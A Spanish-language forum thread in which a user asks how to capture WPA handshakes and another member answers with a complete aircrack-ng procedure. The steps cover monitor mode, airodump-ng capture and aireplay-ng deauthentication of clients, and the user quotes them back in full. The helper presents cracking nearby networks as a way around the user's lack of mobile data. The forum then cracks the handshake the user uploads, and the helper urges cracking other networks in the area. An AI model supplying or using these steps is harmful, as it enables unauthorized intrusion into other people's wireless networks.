Programa para Windows?

[Jona12]

Buen año para todos. Quería consultar si saben de algún programa para capturar handshake usando Windows 11?? Muchas gracias

[notmebug]

A nivel técnico Windows soporta todo lo necesario para poder auditar, pero las soluciones que existen o quedaron obsoletas o ni se acercan a lo que tenés bajo Linux. La buena noticia es que podés instalar Wifislax o Kali en una máquina virtual y así alternar fácilmente entre los dos sistemas.

[Jona12]

A nivel técnico Windows soporta todo lo necesario para poder auditar, pero las soluciones que existen o quedaron obsoletas o ni se acercan a lo que tenés bajo Linux. La buena noticia es que podés instalar Wifislax o Kali en una máquina virtual y así alternar fácilmente entre los dos sistemas.

Ya pude instalar Kali. El gran problema ahora es que ya no tengo casi datos en el celular para poder usarlos en la laptop y así poder correr Kali para obtener los handshake.

[notmebug]

Kali incluye la suite aircrack-ng y drivers con soporte para inyección, así que te sirve "como viene" sin tener que instalar ni actualizar nada más. En una terminal de superusuario habría que usar los siguientes comandos.

Primero detener NetworkManager y wpa_supplicant para que no intenten tomar control del adaptador e interrumpan la tarea.

service NetworkManager stop ; service wpa_supplicant stop

Luego poner el adaptador inalámbrico en modo monitor para poder capturar (si no es wlan0 o hay más de uno, cambiar el nombre según corresponda).

ifconfig wlan0 down ; iw reg set AR ; iwconfig wlan0 mode monitor ; ifconfig wlan0 up

Luego listar todas las redes visibles, y tomar nota del BSSID, canal y ESSID de la(s) que queremos capturar, se puede agregar -c 1,6,11 -f 2000 para escanear sólo los tres canales más usados o --essid NOMBRE para filtrar por nombre exacto.

airodump-ng wlan0

Habiendo tomado nota de los datos, capturar (obviamente hay que reemplazar BSSID, CANAL y NOMBRE por lo que corresponde).

airodump-ng --bssid BSSID -c CANAL -w "NOMBRE" --output-format pcap wlan0

En otra terminal desautenticar clientes para que reconecten y realicen un handshake. Se puede agregar -c MAC para atacar un cliente específico por su MAC lo cual generalmente es mucho más efectivo.

aireplay-ng --deauth 1 -a BSSID wlan0

En cuanto veas "WPA handshake: xx:xx:xx:xx:xx:xx" en la primera ventana, podés detener la captura presionando Ctrl+C y la encontrarás en el directorio /root. Abriéndola con Wireshark y usando "eapol" como filtro se verifica que estén los 4 mensajes y la nonce del 1 y el 3 coincidan.

Para regresar todo a la normalidad (y poder conectarse a Internet).

Volver a poner el adaptador en mono managed.

ifconfig wlan0 down ; iwconfig wlan0 mode managed ; ifconfig wlan0 up

Reiniciar NetworkManager y wpa_supplicant.

service NetworkManager restart ; service wpa_supplicant restart

A este punto podés intentar crackear la o las redes que capturaste o subirlas a este foro en el tema correcto y siguiendo las reglas de posteo para que otros te puedan ayudar. Calculo que con la primera que salga ya quedaría solucionado el tema de no tener datos móviles, y podrías instalar hcxtools y/o buscar un tutorial que explique todo en mejor detalle que yo

[Jona12]

Kali incluye la suite aircrack-ng y drivers con soporte para inyección, así que te sirve "como viene" sin tener que instalar ni actualizar nada más. En una terminal de superusuario habría que usar los siguientes comandos.

Primero detener NetworkManager y wpa_supplicant para que no intenten tomar control del adaptador e interrumpan la tarea.

service NetworkManager stop ; service wpa_supplicant stop

Luego poner el adaptador inalámbrico en modo monitor para poder capturar (si no es wlan0 o hay más de uno, cambiar el nombre según corresponda).

ifconfig wlan0 down ; iw reg set AR ; iwconfig wlan0 mode monitor ; ifconfig wlan0 up

Luego listar todas las redes visibles, y tomar nota del BSSID, canal y ESSID de la(s) que queremos capturar, se puede agregar -c 1,6,11 -f 2000 para escanear sólo los tres canales más usados o --essid NOMBRE para filtrar por nombre exacto.

airodump-ng wlan0

Habiendo tomado nota de los datos, capturar (obviamente hay que reemplazar BSSID, CANAL y NOMBRE por lo que corresponde).

airodump-ng --bssid BSSID -c CANAL -w "NOMBRE" --output-format pcap wlan0

En otra terminal desautenticar clientes para que reconecten y realicen un handshake. Se puede agregar -c MAC para atacar un cliente específico por su MAC lo cual generalmente es mucho más efectivo.

aireplay-ng --deauth 1 -a BSSID wlan0

En cuanto veas "WPA handshake: xx:xx:xx:xx:xx:xx" en la primera ventana, podés detener la captura presionando Ctrl+C y la encontrarás en el directorio /root. Abriéndola con Wireshark y usando "eapol" como filtro se verifica que estén los 4 mensajes y la nonce del 1 y el 3 coincidan.

Para regresar todo a la normalidad (y poder conectarse a Internet).

Volver a poner el adaptador en mono managed.

ifconfig wlan0 down ; iwconfig wlan0 mode managed ; ifconfig wlan0 up

Reiniciar NetworkManager y wpa_supplicant.

service NetworkManager restart ; service wpa_supplicant restart

A este punto podés intentar crackear la o las redes que capturaste o subirlas a este foro en el tema correcto y siguiendo las reglas de posteo para que otros te puedan ayudar. Calculo que con la primera que salga ya quedaría solucionado el tema de no tener datos móviles, y podrías instalar hcxtools y/o buscar un tutorial que explique todo en mejor detalle que yo

Hermosa información. Te agradezco. Ya subí el handshake por si lo querés mirar jajaja. Gracias

[notmebug]

Veo que ya te lo crackearon, pero para la próxima revisá bien esta parte.

Abriéndola [la captura] con Wireshark y usando "eapol" como filtro se verifica que estén los 4 mensajes y la nonce del 1 y el 3 coincidan.

En You are not allowed to view links. Register or Login se explica paso por paso cómo validar una captura. Ya teniendo un poco más de experiencia, fijate si podés capturar, validar y crackear otras redes de tu zona, la mejor forma de aprender es haciendo ¡Éxito!